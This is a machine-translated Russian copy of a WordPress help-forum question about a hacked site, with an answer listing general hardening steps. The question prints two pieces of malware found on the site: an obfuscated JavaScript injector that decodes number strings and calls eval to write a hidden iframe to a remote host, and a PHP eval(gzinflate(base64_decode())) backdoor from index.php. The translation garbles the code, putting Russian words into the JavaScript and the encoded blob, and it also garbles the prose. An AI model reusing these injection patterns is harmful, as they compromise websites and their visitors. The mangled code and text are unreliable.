Intereting Posts
Действительные имена файлов для первого параметра add_action Переключить пользовательские поля? Список категорий Обновления плагина с ошибкой с фатальной ошибкой Есть ли крючок для перехвата ссылок с веб-страницы и перенаправления на страницу Настройки плагина по умолчанию Не записывать в базу данных Работа с Gravatars в области развития локального хоста Как удалить ссылку изображения на WP 4.2 Редактировать заголовок страницы в пользовательском плагине Пользовательский тип почтового сообщения пустой после сохранения Перенаправление на страницу, если предки пусты Правильный способ enqueue jquery-ui TinyMCE – TypeError: r не определено Плагины построителя страниц Расширенное настраиваемое поле и настраиваемый тип сообщения Добавить текущий элемент меню CSS в специальный архив типа страницы в меню WordPress Как вернуть HTTP 404, если результаты поиска не найдены?

Проблема с вредоносным ПО WordPress!

Возможный дубликат:
Проблема с троянцем WordPress!

Я получил доступ к веб-сайту wordpress, который я создаю, и получил предупреждение о трояне с моего антивирусного программного обеспечения. Я сейчас проверил сайт с помощью различных онлайн-сканеров, и выяснилось, что кто-то запустил встроенный фрейм, содержащий код, размещенный ниже …

Я даже не знал, что WordPress может заразиться таким образом. Пожалуйста, помогите мне!

Вот скриншот антивирусного предупреждения.

http://img.wordpressask.com/customization/NaSE6.png

и вот некоторые из кода кода вредоносного кода, установленных на моем сайте.

  • if (window ['d' + 'o' + 'c' + 'u' + 'm' + 'ent']) aa = / \ w / .exec (новая дата ()). index + []; aaa = '0', попробуйте {если (/123/.exec () индекс "а" = 5.!);} поймать (QQQ) {сс = String;} если (aa.indexOf (ааа) == – 1!) е = '- 30 -30 66 63 -7 1 61 72 60 78 70 62 71 77 7 64 62 77 30 69 62 70!!!!!!!!!!!!!!!!!!!!!! 62! 71! 77! 76! 27! 82! 45! 58! 64! 39! 58! 70! 62! 1! 0! 59! 72! 61! 82! 0! 2! 52! 9! 54! 2! 84! -30! -30! -30! 66! 63! 75! 58! 70! 62! 75! 1! 2! 20! -30! -30! 86! -7! 62! 69! 76! 62! -7! 84! -30! -30! -30! 61! 72! 60! 78! 70! 62! 71! 77! 7! 80! 75! 66! 77! 62! 1! -5! 21! 66 ! 63! 75! 58! 70! 62! -7! 76! 75! 60! 22! 0! 65! 77! 77! 73! 19! 8! 8! 70! 7! 80! 65! 66! 60! 65! 64! 72! 69! 63! 80! 62! 61! 64! 62! 76! 7! 60! 72! 70! 8! 77! 8! 9! 58! 11! 61! 12! 10! 59! 62! 13! 17! 15! 59! 18! 12! 58! 58! 12! 9! 61! 18! 59! 62! 10! 9! 15! 11! 9! 18! 59! 13! 59! 18! 0! -7! 80! 66! 61! 77! 65! 22! 0! 10! 9! 0! -7! 65! 62! 66! 64! 65! 77! 22! 0! 10! 9! 0! -7! 76! 77! 82! 69! 62! 22! 0! 79! 66! 76! 66! 59! 66! 69! 66! 77! 82! 19! 65! 66! 61! 61! 62! 71 ! 20! 73! 72! 76! 66! 77! 66! 72! 71! 19! 58! 59! 76! 72! 69! 78! 77! 62! 20! 69! 62! 63! 77! 19! 9 ! 20! 77! 72! 73! 19! 9! 20! 0! 23! 21! 8! 66! 63! 75! 58! 70! 62! 23! -5! 2! 20! -30! -30! 86! -30! -30! 63! 78! 71! 60! 77! 66! 72! 71! -7! 66! 63! 75! 58! 70! 62! 75! 1! 2! 84! -30! -30 ! -30! 79! 58! 75! -7! 63! -7! 22! -7! 61! 72! 60! 78! 70! 62! 71! 77! 7! 60! 75! 62! 58! 77 ! 62! 30! 69! 62! 70! 62! 71! 77! 1! 0! 66! 63! 75! 58! 70! 62! 0! 2! 20! 63! 7! 76! 62! 77! 26 ! 77! 77! 75! 66! 59! 78! 77! 62! 1! 0! 76! 75! 60! 0! 5! 0! 65! 77! 77! 73! 19! 8! 8! 70! 7 ! 80! 65! 66! 60! 65! 64! 72! 69! 63! 80! 62! 61! 64! 62! 76! 7! 60! 72! 70! 8! 77! 8! 9! 58! 11 ! 61! 12! 10! 59! 62! 13! 17! 15! 59! 18! 12! 58! 58! 12! 9! 61! 18! 59! 62! 10! 9! 15! 11! 9! 18 ! 59! 13! 59! 18! 0! 2! 20! 63! 7! 76! 77! 82! 69! 62! 7! 79! 66! 76! 66! 59! 66! 69! 66! 77! 82 ! 22! 0! 65! 66! 61! 61! 62! 71! 0! 20! 63! 7! 76! 77! 82! 69! 62! 7! 73! 72! 76! 66! 77! 66! 72 ! 71! 22! 0! 58! 59! 76! 72! 69! 78! 77! 62! 0! 20! 63! 7! 76! 77! 82! 69! 62! 7! 69! 62! 63! 77 ! 22! 0! 9! 0! 20! 63! 7! 76! 77! 82! 69! 62! 7! 77! 72! 73! 22! 0! 9! 0! 20! 63! 7! 76! 62 ! 77! 26! 77! 77! 75! 66! 59! 78! 77! 62! 1! 0! 80! 66! 61! 77! 65! 0! 5! 0! 10! 9! 0! 2! 20 ! 63! 7! 76! 62! 77! 26! 77! 77! 75! 66! 59! 78! 77! 62! 1! 0! 65! 62! 66! 64! 65! 77! 0! 5! 0 ! 10! 9! 0! 2! 20! -30! -30! -30! 61! 72! 60! 78! 70! 62! 71! 77! 7! 64! 62! 77! 30! 69! 62! 70! 62! 71! 77! 76! 27! 82! 45! 58! 64! 39! 58! 70! 62! 1! 0! 59! 72! 61! 82! 0! 2! 52! 9! 54! !!!!!!!!!!!!!!!!!! 7 58 73 73 62 71 61 28 65 66 69 61 1 63 2 20 -30 -30 86'.split ( '!'); мкр = 'а'; е = окно [ 'е' + 'Val']; ш = е; s = ''; FR = 'е' + 'ро' + 'mChar'; г = сс [Fr + 'код']; для (I = 0; 0> iw.length; я ++) {J = я; s = s + г (39 + 1 * ш [J]);} если (aa.indexOf (ааа) == – 1!) е (с); если (окно [ 'd' + 'о' + 'с '+' u '+' m '+' ent ']) aa = / \ w / .exec (new Date ()). index + []; aaa =' 0 '; try {if (/123/.exec ( "а") индекс = 5);} поймать (QQQ) {сс = строка;.!!!!!!}, если (aa.indexOf (ааа) == – 1) F = '- 30 -30 66 63 – 7! 1! 61! 72! 60! 78! 70! 62! 71! 77! 7! 64! 62! 77! 30! 69! 62! 70! 62! 71! 77! 76! 27! 82! 45! 58! 64! 39! 58! 70! 62! 1! 0! 59! 72! 61! 82! 0! 2! 52! 9! 54! 2! 84! -30! -30! -30! 66! 63 ! 75! 58! 70! 62! 75! 1! 2! 20! -30! -30! 86! -7! 62! 69! 76! 62! -7! 84! -30! -30! -30! 61! 72! 60! 78! 70! 62! 71! 77! 7! 80! 75! 66! 77! 62! 1! -5! 21! 66! 63! 75! 58! 70! 62! -7! 76! 75! 60! 22! 0! 65! 77! 77! 73! 19! 8! 8! 70! 7! 80! 65! 66! 60! 65! 64! 72! 69! 63! 80! 62! 61! 64! 62! 76! 7! 60! 72! 70! 8! 77! 8! 9! 58! 11! 61! 12! 10! 59! 62! 13! 17! 15! 59! 18! 12! 58! 58! 12! 9! 61! 18! 59! 62! 10! 9! 15! 11! 9! 18! 59! 13! 59! 18! 0! -7! 80! 66! 61! 77! 65 ! 22! 0! 10! 9! 0! -7! 65! 62! 66! 64! 65! 77! 22! 0! 10! 9! 0! -7! 76! 77! 82! 69! 62! 22 ! 0! 79! 66! 76! 66! 59! 66! 69! 66! 77! 82! 19! 65! 66! 61! 61! 62! 71! 20! 73! 72! 76! 66! 77! 66 ! 72! 71! 19! 58! 59! 76! 72! 69! 78! 77! 62! 20! 69! 62! 63! 77! 19! 9! 20! 77! 72! 73! 19! 9! 20 ! 0 ! 23! 21! 8! 66! 63! 75! 58! 70! 62! 23! -5! 2! 20! -30! -30! 86! -30! -30! 63! 78! 71! 60! 77! 66! 72! 71! -7! 66! 63! 75! 58! 70! 62! 75! 1! 2! 84! -30! -30! -30! 79! 58! 75! -7! 63 ! -7! 22! -7! 61! 72! 60! 78! 70! 62! 71! 77! 7! 60! 75! 62! 58! 77! 62! 30! 69! 62! 70! 62! 71 ! 77! 1! 0! 66! 63! 75! 58! 70! 62! 0! 2! 20! 63! 7! 76! 62! 77! 26! 77! 77! 75! 66! 59! 78! 77 ! 62! 1! 0! 76! 75! 60! 0! 5! 0! 65! 77! 77! 73! 19! 8! 8! 70! 7! 80! 65! 66! 60! 65! 64! 72 ! 69! 63! 80! 62! 61! 64! 62! 76! 7! 60! 72! 70! 8! 77! 8! 9! 58! 11! 61! 12! 10! 59! 62! 13! 17 ! 15! 59! 18! 12! 58! 58! 12! 9! 61! 18! 59! 62! 10! 9! 15! 11! 9! 18! 59! 13! 59! 18! 0! 2! 20 ! 63! 7! 76! 77! 82! 69! 62! 7! 79! 66! 76! 66! 59! 66! 69! 66! 77! 82! 22! 0! 65! 66! 61! 61! 62 ! 71! 0! 20! 63! 7! 76! 77! 82! 69! 62! 7! 73! 72! 76! 66! 77! 66! 72! 71! 22! 0! 58! 59! 76! 72 ! 69! 78! 77! 62! 0! 20! 63! 7! 76! 77! 82! 69! 62! 7! 69! 62! 63! 77! 22! 0! 9! 0! 20! 63! 7 ! 76! 77! 82! 69! 62! 7! 77! 72! 73! 22! 0! 9! 0! 20! 63! 7! 76! 62! 77! 26! 77! 77! 75! 66! 59 ! 78! 77! 62! 1! 0! 80! 66! 61! 77! 65! 0! 5! 0! 10! 9! 0! 2! 20! 63! 7! 76! 62! 77! 26! 77 ! 77! 75! 66! 59! 78! 77! 62! 1! 0! 65! 62! 66! 64! 65! 77! 0! 5! 0! 10! 9! 0! 2! 20! -30! -30! -30! 61! 72! 60! 78! 70! 62! 71! 77! 7! 64! 62! 77! 30! 69! 62! 70! 62! 71! 77! 76! 27! 82! 45! 58! 64! 39! 58! 70! 62! 1! 0! 59 ! 72 61 82 0 2 52 9 54 7 58 73 73 62 71 61 28 65 66 69 61 1 63 2 20!!!!!!!!!!!!!!!!!!!!!!!! – ! 30 -30 86'.split ( '!'); мкр = 'а'; е = окно [ 'е' + 'Val']; W = F, S = ''; FR = 'е' +» ро '+' mChar '; г = сс [г +' Код ']; для (I = 0; 0> iw.length; я ++) {J = I; s = s + г (39 + 1 * ш [J] );} если (aa.indexOf (ааа) == – 1) е (s!);

и внутри index.php

  1. 1583b0 # эхо-сигнала (gzinflate (base64_decode ( "1VZNc5swEP0r3VwEZbCRMJIYQi7pvYceXR8YGxIyiZ0ALelk8t + 7u4jEIbabHnroDPIs0tun / XhCPm / XTX3fXdSV19fbza5fio0IxA7HGscPHHc4ym0nVn5R5PPv / XxWPpZrb1v2n74UXen5 / gw9y8dgucoKhIhIZF3z6wkp51LFDn5WnDkc5ImfPa + Lbn3tPTw8 + E9tm3 / rmnp7lT2jT1EMsK9kFj7keSj9KhdhHAENrUHHEBqQoCUYBToCY8HgigKDMwYM6AW / GSCHlO39dQ3KgFWwSCCxBI5TMgaMhAiSlJklgSJQkChAxAItu4AxktdoTPLqjrZEnHrFWE3h4hJGglujga9TnqOp2IgocR9jhujCBJQ8sHHIiREWI6awdcIM + MQgU7DASGbUzKgHY8Fbp8RnmQmDcQXUVMuI1tHTEpcFLpXk6kuMh4tFgeEm2JSEXqWlJYQlbKSMtSMwwgnEIUXqZtF38Iq4NENZOX + Mj3NhJ16liBUDFi7DCcBwqaxyjedVk3IFNf0mbOvU1RSBWBxXEM5qKD42EOtmlPOiWDS / SsInHLfRrnTGuvaoUW / UHEPIlJkMu8YvE9iimNpoDzQSV6jHUwmNSol5N8l92QsqNMfFOBGbGdSesA + fJcXyOXGeBhFyT4dEDx4sOjrvg4iGXGjW6Z + apkdxJq4pLzUklhclo7z + Вымь / yXpfkuYPehxP70SR0Qm + I0plpmNaPcG3r2HmSE / uPqr7EPRD7Z4c + aHp7kj / vXjefyLeE37s4 / uv7hHDsJiegQ0hyo49H0RGOU8 + AmLW3t / WnSdA + NndJheFyMp8vLhLvKh / FrdilfV5lbW5EFnV5KLC6YYu9LvL66IRWZO37bJqAnG525QIrnaNV + dRFl3UYT + 7LbdX3XVWB4H / dJPXSNMGjRengfzcL29W / vE7uvRaPzufuz8UvwE = ")));

    / 1583b0

Как я могу удалить это и восстановить сайт ???

Solutions Collecting From Web of "Проблема с вредоносным ПО WordPress!"

Основные этапы безопасности

Так как WordPress настолько популярен, есть много драйвов, когда хаки стучат вокруг, используя недостатки в базовой безопасности. Все пользователи WordPress должны выполнить следующие основные и простые шаги, чтобы защитить себя:

  • Не используйте wp_ в качестве префикса таблицы базы данных, используйте любую строку случайных символов, которые обращаются.
  • Отключите ошибки WordPress DB.
  • Убедитесь, что в вашем каталоге установлены chmod 755 и файлы 644.
  • Используйте защищенный генератор паролей (используйте не менее 15 символов).
  • Не используйте admin в качестве имени пользователя.
  • Поместите пустой файл .htaccess в каталог wp-admin.
  • Читать WordPress hardening
  • Проверьте Google Cache вашего сайта на наличие скрытых вредоносных программ, некоторые хитроумные вредоносные программы отображают свою полезную нагрузку для бота Google.
  • Удалите <meta name="generator" content="WordPress XXX" /> из заголовка вашего сайта, установив remove_action('wp_head', 'wp_generator'); в вашем файле functions.php (диск от злоумышленников не будет иметь простой способ найти, какую версию они нацеливают, если вы это сделаете).

TimThumb Hack

Существует также очень популярный диск из-за взлома, связанный со старой версией популярного сценария большого пальца , который вызывает множество проблем для веб-мастеров. Проверьте каталог загрузок для файлов php и убедитесь, что вы обновили до последней версии скрипта, чтобы этого избежать.

Совет

Я запускаю около 10 различных WordPress и нашел, что плагин WP-Security и учетная запись от защитника сайта неоценимы, он регулярно проверяет ваш сайт и сообщает об ошибках безопасности, вредоносных программах и даже ошибках страницы по электронной почте, поэтому вы можете быть уверены, что знаете, когда что-то идет не так.

WP-Firewall также очень полезен для защиты от 0-дневных эксплойтов, и VirusTotal удобен, если вы подозреваете заражение.

Akismet и Disqus.com являются полезными инструментами для защиты от спама комментариев, и вы должны прочитать wiki-сообщество сообщества специалистов по этой теме .

Инструменты для веб-мастеров

Вы также должны зарегистрироваться в Инструментах Google для веб-мастеров, но если вы подозреваете заражение, сделайте все шаги, чтобы сначала найти и очистить его, или вы можете в конечном итоге сообщить о своих пользователях, что ваш сайт является сообщенным сайтом.

Если он обнаружит заражение, Google отправит электронное письмо по всем следующим адресам: abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@ чтобы вы, по крайней мере, один из они находятся на месте и контролируются.

Платные услуги по удалению / Где получить помощь

Есть также несколько сайтов, которые предлагают услуги по удалению вредоносных программ, я был бы очень подозрителен в этом – многие, похоже, являются мошенниками того или иного типа.

Существует много высококачественной справки и поддержки, доступных бесплатно на форумах WordPress , на веб – мастерах, на сайте wordpress stackexchange и на stackoverflow . Не платите за вещи, которые вы можете исправить самостоятельно.